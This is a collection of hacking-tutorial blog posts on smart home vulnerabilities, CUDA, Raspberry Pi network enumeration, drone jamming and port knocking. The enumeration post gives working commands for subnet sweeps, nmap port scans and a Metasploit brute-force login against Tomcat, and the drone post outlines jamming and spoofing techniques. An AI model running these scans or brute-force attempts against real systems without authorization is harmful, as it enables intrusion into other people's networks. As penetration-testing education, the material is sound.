By: OTW
18 November 2025 at 13:25

Welcome back, my aspiring cyberwarriors!

As smart homes become ever more common in our digital world, they have become a favorite target for hackers. We have seen SO many smart home devices compromised, with the hackers then using those devices to pivot to other devices connected to the local area network, such as phones and laptops.

Smart homes now include a huge range of devices, such as:

  1. Smart TVs
  2. Smart Lighting
  3. Smart Garage Door Openers
  4. Smart Security Systems
  5. Smart Cameras
  6. Smart Appliances (Refrigerators, stoves, washers, dryers, etc.)
  7. Smart Picture Frames
  8. Smart Infotainment Systems
  9. and so many more

Each of these smart devices has a small CPU, a small amount of RAM, and a Linux operating system, most commonly BusyBox due to its very small size. These systems are very often shipped with little forethought regarding security. This makes it relatively easy to hack these devices.

In addition, these devices are often connected to your Wi-Fi, Bluetooth, or Zigbee network. Each of these network types is vulnerable to multiple attack vectors, leaving the entire home and the devices within it exposed.

To learn more about Smart Home Hacking, consider attending our Smart Home Hacking training, January 13-15.

Here are the most significant security risks documented in recent research and threat reports:

Common Smart Home Vulnerabilities

  • Weak or Default Credentials
    • Many smart home devices ship with weak, default, or hardcoded passwords, which attackers can easily guess or find online.
    • Credential stuffing and password reuse across multiple devices leads to widespread compromise.
  • Outdated and Unpatched Firmware
    • A high proportion of smart devices run old firmware with known vulnerabilities and rarely receive updates or security patches, leaving them open to exploitation.
    • Supply chain vulnerabilities can introduce malware before devices even reach the consumer (such as Badbox 2.0).
  • Vulnerable Network Services and Open Ports
    • Devices expose unnecessary or insecure services to the local network or internet (e.g., Telnet, UPnP, poorly secured web interfaces), facilitating remote exploitation.
    • Automated scanning for open ports is a dominant attack method, accounting for over 93% of blocked events in recent studies.
  • Poor Encryption and Data Protection
    • Many smart devices transmit sensitive data (e.g., audio, video, sensor readings) without proper encryption, enabling eavesdropping and privacy breaches.
    • Weak or flawed cryptographic implementations allow attackers to decrypt captured traffic or manipulate device functionality.
  • Device Hijacking and Botnets
    • Attackers can take over smart devices, using them as proxies for further attacks (DDoS, ad fraud, credential theft) or as part of large-scale botnets (Mirai, EchoBot, PUMABOT).
    • Compromised devices may serve attacks on other systems without user awareness—sometimes even posing physical safety risks (e.g., hijacked locks or thermostats).
  • Privacy and Data Exposure
    • Insecure cameras, microphones, and voice assistants can be used for covert surveillance or to steal sensitive data.
    • Exposed cloud APIs and device “phone home” features can leak data to third parties or attackers.
  • Weak Access Controls
    • Poor onboarding, lack of two-factor authentication, flawed pairing mechanisms, and weak authorization checks let attackers gain access to devices or sensitive controls.

Real-World Examples (2025)

  • Smart TVs, streaming devices, and IP cameras are currently the most exploited categories, often running on Linux/Android with outdated kernels.
  • Malicious firmware (such as BadBOX) pre-installed on consumer devices has led to huge botnets and residential proxy abuse, sometimes before devices are even plugged in by the end user.
  • Large-scale privacy violations include attackers publicly streaming home camera footage due to default credentials or unpatched vulnerabilities.

Summary Table

Vulnerability Type         | Example Consequence
Default/weak credentials   | Easy unauthorized access
Outdated firmware          | Exposure to known exploits
Open network services      | Remote code execution, botnets
Poor encryption            | Data interception, manipulation
Device hijacking/botnets   | DDoS, fraud, lateral movement
Weak access controls       | Device takeover, privacy breaches
Privacy/data exposure      | Surveillance, data theft

Summary

Smart homes are becoming increasingly popular in industrialized countries, particularly among higher-income households. They offer the user convenience while presenting an enticing target for hackers. If an attacker can compromise even one device within the home, then all of the devices on the home network are at risk!

To learn more about Smart Home Hacking and Security, consider attending our upcoming Smart Home Hacking training in January 2026.

What is NVIDIA’s CUDA and How is it Used in Cybersecurity?

By: OTW
17 November 2025 at 17:09

Welcome back my aspiring cyberwarriors!

You have likely heard of the company NVIDIA. Not only is it the dominant company in computer graphics adapters (if you are a gamer, you likely have one), it is now dominant in artificial intelligence as well. In recent weeks, it has become the most valuable company in the world ($5 trillion).

The two primary reasons that Nvidia has become so important to artificial intelligence are:

  1. Nvidia chips can process data in many threads at once, in some cases thousands, which makes complex parallel calculations possible and dramatically faster.
  2. Nvidia created a development environment named CUDA for harnessing the power of these GPUs. This development environment is a favorite among artificial intelligence, data analytics, and cybersecurity professionals.

Let's take a brief moment to examine this powerful environment.

What is CUDA?

Most computers have two main processors:

CPU (Central Processing Unit): General-purpose, executes instructions sequentially or on a small number of cores. CPUs such as those from Intel and AMD provide the flexibility to run many different applications on your computer.

GPU (Graphics Processing Unit): Originally designed to draw graphics for applications such as games and VR environments, GPUs contain hundreds or thousands of small cores that excel at doing the same thing many times in parallel.

CUDA (Compute Unified Device Architecture) is NVIDIA’s framework that lets you take control of the GPU for general computing tasks. In other words, CUDA lets you write code that doesn’t just render graphics—it crunches numbers at massive scale. That’s why it’s a favorite for machine learning, password cracking, and scientific computing.

Why Should Hackers & Developers Care?

CUDA matters as an important tool in your cybersecurity toolkit because:

Speed: A GPU can run password hashes or machine learning models orders of magnitude faster than a CPU.

Parallelism: If you need to test millions of combinations, analyze huge datasets, or simulate workloads, CUDA gives you raw power.

Applications in Hacking: Tools like Hashcat and Pyrit use CUDA to massively accelerate brute-force and dictionary attacks. Security researchers who understand CUDA can customize or write their own GPU-accelerated tools.

The CUDA environment sees the GPU as a device with:

Threads: The smallest execution unit (like a tiny worker).

Blocks: Groups of threads.

Grids: Groups of blocks.

Think of it like this:

  • A CPU worker can cook one meal at a time.
  • A GPU is like a kitchen with thousands of cooks—we split the work (threads), organize them into brigades (blocks), and assign the whole team to the job (grid).
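In code, each "cook" figures out which plate is theirs using the built-in indexing variables. The standard pattern for computing a unique global index looks like this (the bounds check assumes you pass the element count into the kernel):

__global__ void worker(int *data, int n) {
    // Global index: which element this thread owns
    int idx = blockIdx.x * blockDim.x + threadIdx.x;
    if (idx < n) {          // guard against extra threads in the last block
        data[idx] *= 2;     // each thread processes exactly one element
    }
}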

Coding With CUDA

CUDA extends C/C++ with some keywords.
Here’s the simple workflow:

  1. You write a kernel function (runs on the GPU).
  2. You call it from the host code (the CPU side).
  3. Launch thousands of threads in parallel → GPU executes them fast.

Example skeleton code:

__global__ void add(int *a, int *b, int *c) {
    int idx = threadIdx.x;
    c[idx] = a[idx] + b[idx];
}

int main() {
    // Allocate memory on host and device
    // Copy data to GPU
    // Run kernel with N threads
    add<<<1, N>>>(dev_a, dev_b, dev_c);
    // Copy results back to host
}

The keywords:

  • __global__ → A function (kernel) run on the GPU.
  • threadIdx → Built-in variable identifying which thread you are.
  • <<<1, N>>> → Tells CUDA to launch 1 block of N threads.

This simple example adds two arrays in parallel. Imagine scaling this to millions of operations at once!
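The comment placeholders above hide the host-side plumbing. A complete, minimal version might look like this (the array size and values are arbitrary, and error checking is omitted for brevity):

#include <stdio.h>

__global__ void add(int *a, int *b, int *c) {
    int idx = threadIdx.x;
    c[idx] = a[idx] + b[idx];
}

int main() {
    const int N = 8;
    int a[N], b[N], c[N];
    for (int i = 0; i < N; i++) { a[i] = i; b[i] = i * 10; }

    // Allocate memory on the GPU
    int *dev_a, *dev_b, *dev_c;
    cudaMalloc((void **)&dev_a, N * sizeof(int));
    cudaMalloc((void **)&dev_b, N * sizeof(int));
    cudaMalloc((void **)&dev_c, N * sizeof(int));

    // Copy the input arrays from host to device
    cudaMemcpy(dev_a, a, N * sizeof(int), cudaMemcpyHostToDevice);
    cudaMemcpy(dev_b, b, N * sizeof(int), cudaMemcpyHostToDevice);

    // Launch one block of N threads; each thread adds one pair of elements
    add<<<1, N>>>(dev_a, dev_b, dev_c);

    // Copy the result back to the host and print it
    cudaMemcpy(c, dev_c, N * sizeof(int), cudaMemcpyDeviceToHost);
    for (int i = 0; i < N; i++) printf("%d ", c[i]);
    printf("\n");

    cudaFree(dev_a); cudaFree(dev_b); cudaFree(dev_c);
    return 0;
}

Compile it with nvcc exactly as shown in the next section.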

The CUDA Toolchain Setup

If you want to try CUDA, make certain you have the following items:

1. An NVIDIA GPU.

2. The CUDA Toolkit (contains the compiler nvcc).

3. Your CUDA program written in C/C++ and compiled with nvcc.

Then run it and watch your GPU chew through problems.

To install the CUDA toolkit in Kali Linux, simply enter:

kali > sudo apt install nvidia-cuda-toolkit

Next, write your code and compile it with nvcc, such as:

kali > nvcc hackersarise.cu -o hackersarise

Practical Applications of CUDA

CUDA is already excelling at hacking and computing applications such as:

  1. Password cracking (Hashcat, John the Ripper with GPU support).
  2. AI & ML (TensorFlow/PyTorch use CUDA under the hood). Our application of using Wi-Fi to see through walls uses CUDA.
  3. Cryptanalysis (breaking encryption) & simulation tasks.
  4. Network packet analysis at high scale.

As a beginner, start with small projects—then explore how to take compute-heavy tasks and offload them to the GPU.

Summary

CUDA is NVIDIA’s way of letting you program GPUs for general-purpose computing. To the hacker or cybersecurity pro, it’s a way to supercharge computation-heavy tasks.

Learn the thread-block-grid model, write simple kernels, and then think: what problems can I solve dramatically faster if run in parallel?


Hacking with the Raspberry Pi: Network Enumeration

17 November 2025 at 10:03

Welcome back, my aspiring cyberwarriors!

We continue exploring the Raspberry Pi’s potential for hacking. In this article, we’ll dive into network enumeration.

Enumeration is the foundational step of any penetration test—it involves systematically gathering detailed information about the hosts, services, and topology of the network you’re targeting. For the purposes of this guide, we’ll assume that you already have a foothold within the network—whether through physical proximity, compromised credentials, or another form of access—allowing you to apply a range of enumeration techniques.

Let’s get started!

Step #1: Fping

To get started, we’ll examine a lightweight utility called fping. It leverages the Internet Control Message Protocol (ICMP) echo request to determine whether a target host is responding. Unlike the traditional ping command, fping lets you specify any number of targets directly on the command line—or supply a file containing a list of targets to probe. This allows us to do a basic network discovery.

Fping comes preinstalled on Kali Linux. To confirm that it’s available and view its options, you can display the help page.

kali> fping -h

To run a quiet scan, we can use the following command:

kali> sudo fping -I wlan0 -q -a -g 192.168.0.0/24

This command runs fping with root privileges to quietly scan all IP addresses in the 192.168.0.0/24 network via the wlan0 interface, showing only the IPs that respond (i.e., hosts that are alive). At this point, we can see which systems are live on the network and are ready to be exploited. At its core, fping is very lightweight; when I ran htop and fping simultaneously, I observed the following output:

As you can see, CPU usage is around 2% and memory usage is less than 1% in my case (my Pi board has 4 cores and 2GB of RAM).

Step #2: Nmap

At this point, we have identified our target and can move on to the next step: network mapping with Nmap to see which ports are open. Nmap is one of the best-known tools in the cybersecurity field, and Hackers-Arise offers a dedicated training course for mastering it; you can find it at the link.

I assume you already have a basic understanding of Nmap, so we can proceed to network enumeration.

Let’s run a simple Nmap scan to check for open ports:

kali> sudo nmap -p- --open --min-rate 5000 -n -Pn 192.168.0.150 -oG open_ports

This command checks all 65,535 TCP ports and only shows the ones that are open. It uses a high scan rate for speed (5000 packets per second) and skips DNS resolution, assuming the host is up, without pinging it. Also, the results are saved in a grepable format to a file called open_ports, so we can analyze them later.

At its peak, CPU usage was around 33%, with memory usage around 2%.

As a result, we found twelve open ports and can now move on to gathering a bit more information.
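To turn the grepable output into a comma-separated port list for the follow-up scan, a one-liner with standard GNU tools does the trick:

kali> grep -oP '\d+/open' open_ports | cut -d/ -f1 | sort -nu | paste -sd, -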

kali> sudo nmap -sC -sV -p135,139,445,5040,8080,49664,49665,49666,49667,49668,49669,49670 192.168.0.150

This executes Nmap's default script set (-sC) to gather additional details, such as banners and common misconfigurations, from the services listening on the scanned ports. Additionally, -sV performs service version detection.

This scan revealed some important information for further exploitation. The Raspberry Pi handled it quite well. I saw a brief spike in resource usage at the start, but it remained very low afterward.

Step #3: Exploitation

Let’s assume our reconnaissance is complete and we’ve discovered that the Tomcat application may be using weak credentials. We can now launch Metasploit and attempt a brute-force login.

msf6> use scanner/http/tomcat_mgr_login
msf6> set RHOSTS 192.168.0.150
msf6> run
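If the defaults don't turn up valid credentials, you can point the module at your own wordlists and run it again; it accepts the standard brute-force options (the paths below are examples from a typical Kali install):

msf6> set USER_FILE /usr/share/wordlists/metasploit/tomcat_mgr_default_users.txt
msf6> set PASS_FILE /usr/share/wordlists/metasploit/tomcat_mgr_default_pass.txt
msf6> set STOP_ON_SUCCESS true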

The Raspberry Pi struggles somewhat to start Metasploit, although once it is running there are typically no issues.

Summary

The Raspberry Pi is a very powerful tool for every hacker. Our tools are generally lightweight, and the resources of this small board are enough to handle most tasks. So, if your budget is limited, buy a Raspberry Pi, connect it to your TV, and start learning cybersecurity.

If you want to grow in the pentesting field, check out our CWA Preparation Course — get certified, get hired, and start your journey!

SDR (Signals Intelligence) for Hackers: Getting Started with Anti-Drone Warfare

14 November 2025 at 10:33

Welcome back, aspiring cyberwarriors!

In modern warfare, we're dealing with a whole new battlefield—one that's invisible to the naked eye but just as deadly as kinetic warfare. Drones, or unmanned aerial vehicles (UAVs), have completely changed the game. From small commercial quadcopters rigged with grenades to sophisticated military platforms conducting precision strikes, these aerial threats are everywhere on today's battlefield.

But here’s the thing: they all depend on the electromagnetic spectrum to communicate, navigate, and operate. And that’s where Electronic Warfare (EW) comes in. Specifically, we’re talking about Electronic Countermeasures (ECM) designed to jam, disrupt, or even hijack these flying threats.

In this article, we’ll dive into how this invisible war is being fought. Let’s get rolling!

Understanding Radio-Electronic Warfare

Jamming UAVs falls under what’s called Radio-Electronic Warfare. The mission is simple in concept but complex in execution: disorganize the enemy’s command and control, wreck their reconnaissance efforts, and keep our own systems running smoothly.

Within this framework, we have COMJAM (suppression of radio communication channels). This is the bread and butter of counter-drone operations—disrupting the channels that control equipment and weapons, including those UAVs.

How Jamming Actually Works

Let’s get real about how this stuff actually works. It’s really just exploiting basic radio physics and the limitations of receiver systems.

Basic Jamming Principle

The Signal-to-Noise Game

All radio communication depends on what we call the signal-to-noise ratio (SNR). For a drone to receive its control commands or GPS signals, the legitimate signal must be stronger than the background electromagnetic noise.

This follows what’s known as the “jamming equation.” Here’s what matters:

Power output. A 30-watt personal jammer might protect just you and a small group of people, while a 200-watt system can throw up an electronic dome over a much bigger area. More watts equals more range and effectiveness.

Distance relationships. Think about it—the drone operator’s control signal has to travel several kilometers to reach the drone. But if we position our jammer between them or near the drone, we’ve got a much shorter transmission path.

Antenna gain. Directional antennas focus our jamming energy like a spotlight instead of a light bulb.

Frequency selectivity means we can target specific frequency bands used by drones while leaving other communications alone.
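Put together, these factors give a simplified free-space form of the jamming equation: the jamming-to-signal ratio at the drone's receiver. This is a textbook approximation that ignores antenna patterns toward the receiver and real-world propagation losses, but it captures the intuition:

J/S = (Pj * Gj) / (Pt * Gt) * (Rt / Rj)^2

Here Pj and Gj are the jammer's power and antenna gain, Pt and Gt are the operator's, Rt is the operator-to-drone distance, and Rj is the jammer-to-drone distance. Jamming succeeds when J/S exceeds the ratio the drone's receiver can tolerate, which is why a modest jammer positioned close to the drone can beat a powerful transmitter far away.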

Types of Jamming Signals

Types of Jamming Techniques


Different situations call for different jamming techniques:

Noise jamming. We simply send random radio-frequency energy across the target frequencies, creating a "wall" of interference.

Tone jamming transmits continuous wave signals at specific frequencies. It’s more power-efficient for targeting narrow-band communications, but modern systems can filter this out more easily.

Pulse jamming uses intermittent bursts of energy. This can be devastating against receivers that use time-based processing, and it conserves our jammer’s power for longer operations.

Swept jamming rapidly changes frequencies across a band. If the enemy drone is frequency-hopping to avoid us, swept jamming ensures we’re hitting them somewhere, though with less power at any single frequency at any moment.

Barrage jamming simultaneously broadcasts across wide frequency ranges. It’s comprehensive coverage, but it requires serious power output.

Smart Jamming and Spoofing

The most basic jamming just drowns out signals with noise. But the most advanced systems go way beyond that, using what we call “smart jamming” or spoofing.

Smart jamming means analyzing the source signal in real-time, understanding how it works, and then replacing it with a more powerful, false signal that the target system will actually accept as legitimate.

In the context of UAV operations, this gets really sophisticated. Systems can manipulate GPS signals to provide false positioning data, making drones think they're somewhere they're not—that's spoofing. Even more advanced are systems like the Shipovnik-Aero complex, which can actually penetrate the UAV's onboard systems and potentially take control.

Shipovnik-Aero Complex

What Actually Happens When We Jam a Drone

When we successfully jam a drone, what happens depends on what we’re targeting and how the drone is programmed to respond:

Control link jamming cuts the command channel between the operator and the drone. Depending on its fail-safe programming, the drone might hover in place, automatically return to its launch point, attempt to land immediately, or continue its last programmed mission autonomously.

GPS/GNSS jamming denies the drone accurate position information. Without GPS, most commercial drones and many military ones can’t maintain stable flight or navigate to targets. Some will fall back on inertial navigation systems, but those accumulate errors over time. Others become completely disoriented and crash.

Video link jamming blinds FPV operators, forcing them to fly without visual reference. This is particularly effective against FPV kamikaze drones, which require continuous video feedback for precision targeting.

Combined jamming hits multiple systems simultaneously—control, navigation, and video—creating a comprehensive denial effect that overwhelms even drones with redundant systems.

The Arsenal of Counter-Drone Electronic Warfare Systems

The modern battlefield has an array of EW systems designed specifically for detecting and suppressing drones. These range from massive, brigade-level complexes that can throw up electronic domes over vast areas to small, portable units that individual soldiers can carry for personal protection.

Dedicated Counter-UAS (C-UAS) Systems

The AUDS (Anti-UAV Defence System) is an example of dedicated C-UAS tech. It suppresses communication channels between UAVs and their operators with suppression distances of 2-4 kilometers for small UAVs and up to 8 kilometers for medium-sized platforms. The variation in range reflects the different power levels and signal characteristics of various drone types.

AUDS

The M-LIDS (Mobile-Low, Slow, Small Unmanned Aircraft System Integrated Defeat System) takes a more comprehensive approach. This system doesn’t just jam—it combines an EW suite with a 30mm counter-drone cannon for kinetic kills and even deploys Coyote kamikaze UAVs. It’s literally using drones to fight drones.

M-LIDS

Russian Federation EW Complexes

Russian forces have invested heavily in electronic warfare, including numerous systems specifically designed for drone suppression.

The Leer-2 system offers suppression of UAV communication channels at 4 kilometers for small UAVs and up to 8 kilometers for medium platforms. The Silok system is basically a mobile variant mounted on a Kamaz chassis, with a suppression distance of 3-4 kilometers, giving tactical units mobile EW capabilities.

Leer-2

The Repellent-1 system specifically targets UAV communication channels and satellite navigation, operating in the 200-600 MHz frequency range with a suppression distance of up to 30 kilometers.

Repellent-1

Personal and Tactical-Level Counter-Drone Protection

Big systems are great for area defense, but the ubiquity of small drones has created massive demand for personal and small-unit protection. These portable devices focus on the most commonly used frequencies for commercial and modified commercial drones, providing immediate, localized protection.

The UNWAVE SHATRO represents cutting-edge personal counter-drone protection. Available in portable, wearable, and mobile versions, this system creates a protective bubble with a radius of 50-100 meters, specifically targeting guided munitions and UAVs operating in the 850-930 MHz range.

UNWAVE SHATRO

The UNWAVE BOOMBOX offers both directed protection (up to 500 meters) and omnidirectional coverage (100 meters), targeting multiple frequency bands critical to drone operations. By suppressing frequencies including 850-930 MHz, 1550-1620 MHz (GPS), 2400-2480 MHz (Wi-Fi/Control), and 5725-5850 MHz (Wi-Fi/Video), this system addresses the full spectrum of commercial drone communication and navigation systems.

UNWAVE BOOMBOX

Summary

This article examines the role of Electronic Warfare (EW) in combating unmanned aerial vehicles (UAVs), which rely on electromagnetic signals for operation. It discusses jamming techniques like noise, tone, and pulse jamming, along with advanced methods such as smart jamming and spoofing.

The invisible war for control of the electromagnetic spectrum may not capture headlines like kinetic combat, but make no mistake—it’s every bit as crucial to the outcome of modern conflicts.

Look for our Anti-Drone Warfare training in 2026!

Hacking with the Raspberry Pi: Getting Started with Port Knocking

13 November 2025 at 12:10

Welcome back, aspiring cyberwarriors!

As you are aware, traditional security approaches typically involve firewalls that either allow or deny traffic to specific ports. The problem is that allowed ports are visible to anyone running a port scan, making them targets for exploitation. Port knocking takes a different approach: all ports appear filtered (no response) to the outside world until you send a specific sequence of connection attempts to predetermined ports in the correct order. Only then does your firewall open the desired port for your IP address.

Let’s explore how this technique works!

What is Port Knocking?

Port knocking is a method of externally opening ports on a firewall by generating a connection attempt sequence to closed ports. When the correct sequence of port “knocks” is received, the firewall dynamically opens the requested port for the source IP address that sent the correct knock sequence.

The beauty of this technique is its simplicity. A daemon (typically called knockd) runs on your server and monitors firewall logs or packet captures for specific connection patterns. When it detects the correct sequence, it executes a command to modify your firewall rules, usually opening a specific port for a limited time or for your specific IP address only.

The knock sequence can be as simple as attempting connections to three ports in order, like 7000, 8000, 9000, or as complex as a lengthy sequence with timing requirements. The more complex your sequence, the harder it is for an attacker to guess or discover through brute force.

The Scenario: Securing SSH Access to Your Raspberry Pi

For this tutorial, I'll demonstrate port knocking between a Kali Linux machine and a Raspberry Pi. This is a realistic scenario that many of you might use in your home lab or for remote management of IoT devices. The Raspberry Pi will run the knockd daemon and have SSH access hidden behind port knocking, while our Kali machine will perform the knocking sequence to gain access.

Step #1: Setting Up the Raspberry Pi (The Server)

Let’s start by configuring our Raspberry Pi to respond to port knocking. First, we need to install the knockd daemon:

pi> sudo apt install knockd

The configuration file for knockd is located at /etc/knockd.conf. Let’s open it.

Here's a default configuration that is recommended for beginners. The only change I made was replacing the -A flag with -I, which inserts the rule at position 1 (the top) so it is evaluated before any DROP rules.

The [openSSH] section defines our knock sequence: connections must be attempted to ports 7000, 8000, and 9000 in that exact order. The seq_timeout of 5 seconds means all three knocks must occur within 5 seconds of each other. When the correct sequence is detected, knockd executes the iptables command to allow SSH connections from your IP address.

The [closeSSH] section does the reverse: it uses the knock sequence in reverse order (9000, 8000, 7000) to close the SSH port again.
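For reference, a minimal knockd.conf implementing this setup typically looks like the following (the ports, timeout, and -I insertion match the description above; adjust the iptables path for your distribution):

[options]
    UseSyslog

[openSSH]
    sequence    = 7000,8000,9000
    seq_timeout = 5
    command     = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

The %IP% placeholder is expanded by knockd to the address that performed the knock, so only your machine gets access.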

Now we need to enable knockd to start on boot:

pi> sudo vim /etc/default/knockd

Change the line START_KNOCKD=0 to START_KNOCKD=1 and make sure the network interface is set correctly.

Step #2: Configuring the Firewall

Before we start knockd, we need to configure our firewall to block SSH by default. This is critical because port knocking only works if the port is actually closed initially.

First, let’s set up basic iptables rules:

pi> sudo apt install iptables

pi> sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

pi> sudo iptables -A INPUT -p tcp --dport 22 -j DROP

pi> sudo iptables -A INPUT -j DROP

These rules allow established connections to continue (so your current SSH session won’t be dropped), block new SSH connections, and drop all other incoming traffic by default.
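You can confirm the rules and their order at any time; the order matters because knockd will insert its ACCEPT rule at position 1, above the DROP rules:

pi> sudo iptables -L INPUT -n --line-numbers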

Now start the knockd daemon:

pi> sudo systemctl start knockd
pi> sudo systemctl enable knockd

Your Raspberry Pi is now configured and waiting for the secret knock! From the outside world, the SSH port simply appears filtered.

Step #3: Installing Knock Client on Kali Linux

Now let’s switch to our Kali Linux machine. We need to install the knock client, which is the tool we’ll use to send our port knocking sequence.

kali> sudo apt-get install knockd

The knock client is actually part of the same package as the knockd daemon, but we’ll only use the client portion on our Kali machine.

Step #4: Performing the Port Knock

Before we try to SSH to our Raspberry Pi, we need to perform our secret knock sequence. From your Kali Linux terminal, run:

kali> knock -v 192.168.0.113 7000 8000 9000

The knock client sends TCP SYN packets to each port in sequence. These packets are observed by the knockd daemon on your Raspberry Pi, which recognizes the pattern and opens SSH for your IP address.

Now, immediately after knocking, try to SSH to your Raspberry Pi:

If everything is configured correctly, you should connect successfully! The knockd daemon recognized your knock sequence and added a temporary iptables rule allowing your IP address to access SSH.

When you’re done with your SSH session, you can close the port again by sending the reverse knock sequence:

kali> knock -v 192.168.0.113 9000 8000 7000

Step #5: Verifying Port Knocking is Working

Let’s verify that our port knocking is actually providing security. Without performing the knock sequence first, try to SSH directly to your Raspberry Pi:

The connection should hang and eventually timeout. If you run nmap against your Raspberry Pi without knocking first, you’ll see that port 22 appears filtered:
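For example, using the same target as before:

kali> nmap -p 22 192.168.0.113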

Now perform your knock sequence and immediately scan again:
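For example, chaining the knock and the scan (same sequence and target as before):

kali> knock -v 192.168.0.113 7000 8000 9000 && nmap -p 22 192.168.0.113

With the configuration above, the port then stays open for your IP address until you send the close sequence.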

This demonstrates how port knocking keeps services filtered until the correct sequence is provided.

Summary

Port knocking is a powerful technique for adding an extra layer of security to remote access services. By requiring a specific sequence of connection attempts before opening a port, it makes your services harder for attackers to detect and reduces your attack surface. But remember that port knocking should be part of a defense-in-depth strategy, not a standalone security solution.
